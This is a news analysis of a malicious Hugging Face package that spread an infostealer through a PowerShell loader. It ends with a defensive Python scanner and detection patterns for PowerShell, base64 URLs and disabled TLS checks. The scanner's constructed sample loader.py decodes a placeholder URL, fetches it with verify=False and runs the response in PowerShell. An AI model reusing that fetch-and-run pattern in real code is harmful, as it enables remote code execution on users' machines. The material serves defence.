Security firm HiddenLayer reported Tuesday that a malicious package on Hugging Face, "Open-OSS/privacy-filter", had accumulated approximately 244,000 downloads and 667 likes by cloning the README of OpenAI's legitimate Privacy Filter project. The package shipped a `loader.py` that ran PowerShell commands to fetch a Rust-based infostealer targeting browsers, Discord sessions, cryptocurrency wallets, and system information on Windows hosts. Hugging Face removed the repo after the report. HiddenLayer notes the download count "may have been artificially inflated by the attackers to make the model seem more popular," but the package still reached top trending status in under 18 hours. Anyone who actually executed `loader.py` is advised to treat their system as compromised.
The attack vector wasn't novel; it's the same shape AI-marketplace security researchers have been flagging for two years: typosquatted namespace, cloned README, malicious loader code hidden in a Python file rather than in the model weights anyone came to download. Specifically, `loader.py` disabled SSL verification, base64-decoded a URL, downloaded batch files, and set up persistence via scheduled tasks masquerading as Microsoft Edge updates. The Rust infostealer payload is the contemporary commodity-malware shape (browser cookies, Discord tokens, crypto wallet `.dat` files, system fingerprints), sold and reused across dozens of distinct campaigns. HiddenLayer reported it; Hugging Face's response was takedown-after-report, not detection-before-trending. The 244,000 download count is the part everyone should pause on: even if half is bot inflation, that's still tens of thousands of likely-real machines that pulled the package.
Hugging Face has been the de facto distribution point for open-source AI models since 2022, with the marketplace shape (public repos, anonymous-friendly publishing, namespace squatting permitted, README cloning undetected) that npm, PyPI, and Docker Hub spent the last decade trying to harden. Two years after academic work first flagged these issues (the 2024 papers on Hugging Face pickle vulnerabilities), and after several smaller incidents in the interim, the marketplace still doesn't run automatic README-similarity detection on uploads, automatic namespace-impersonation checks, or holdback periods on trending status until human review. The Open-OSS/privacy-filter case is the first one with download numbers loud enough to force the conversation. Expect a HiddenLayer/Manifold-style market for ML-supply-chain security products to grow on the back of it; Manifold's Manifest MCP-server scoring product (announced separately this week) is the same shape applied to MCP servers, and both are reading the same market gap.
If you've installed a "privacy-filter" model from Hugging Face recently, especially from any "Open-OSS" namespace, check the file list for a `loader.py` containing PowerShell plus base64-encoded URLs, and if found, treat the host as compromised: rotate Discord tokens, browser-saved credentials, crypto wallet keys, and anything cached on disk. More broadly, the lesson for anyone using Hugging Face in production: namespace-pinning is doing more work than people realized, and "popular" is not a security signal. Top-trending in under 18 hours with a cloned README and a malicious loader is a threat shape, not an aberration. Watch for HF to ship namespace-impersonation detection and review-before-trending controls over the next quarter; if they don't, the market for third-party scanners (HiddenLayer, Manifold, and the wave behind them) is the bet.
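The file-list check described above, as an added example (not HiddenLayer's or Hugging Face's tooling): an offline scan of a downloaded repo's code files for base64-encoded URLs, PowerShell invocations and disabled TLS verification, with the "treat as compromised" rule being PowerShell plus a decoded URL in the same file. The sample repo, the `.invalid` URL and the function names are constructed for this example.

```python
# Added example, not HiddenLayer's or Hugging Face's code: offline triage of a
# downloaded model repo for the loader.py indicators above. Fixture is constructed.
import base64
import re

POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.IGNORECASE)
SSL_OFF_RE = re.compile(r"verify\s*=\s*False|check_hostname\s*=\s*False|CERT_NONE")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # candidate base64 literals

def decoded_urls(source: str) -> list[str]:
    """Base64 literals in the text that decode to an http(s) URL."""
    urls = []
    for m in B64_RE.finditer(source):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except ValueError:  # not valid base64, or not ASCII text
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def scan_repo(files: dict[str, str]) -> list[tuple[str, str, str]]:
    """files maps repo path -> text. Returns (path, indicator, detail) triples."""
    out = []
    for path, text in files.items():
        if not path.endswith((".py", ".ps1", ".bat")):  # weights/config not scanned
            continue
        out += [(path, "base64-url", u) for u in decoded_urls(text)]
        for name, rx in (("powershell", POWERSHELL_RE), ("ssl-off", SSL_OFF_RE)):
            hit = rx.search(text)
            if hit:
                out.append((path, name, hit.group(0)))
    return out

def treat_as_compromised(findings: list[tuple[str, str, str]]) -> bool:
    """The rule from the text: PowerShell plus a base64-encoded URL in one file."""
    seen: dict[str, set[str]] = {}
    for path, indicator, _ in findings:
        seen.setdefault(path, set()).add(indicator)
    return any({"powershell", "base64-url"} <= s for s in seen.values())

# Constructed stand-in for a downloaded repo's file list; URL uses the reserved .invalid TLD.
ENCODED = base64.b64encode(b"https://example.invalid/fetch").decode()
SAMPLE_REPO = {
    "README.md": "# Privacy Filter\nRedacts PII from text.",
    "loader.py": ("import base64, requests, subprocess\n"
                  f'url = base64.b64decode("{ENCODED}").decode()\n'
                  "r = requests.get(url, verify=False)\n"
                  'subprocess.run(["powershell", "-c", r.text])\n'),
}
```

For a real repo, build the `files` dict from the local snapshot directory before anything in it is imported or executed.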
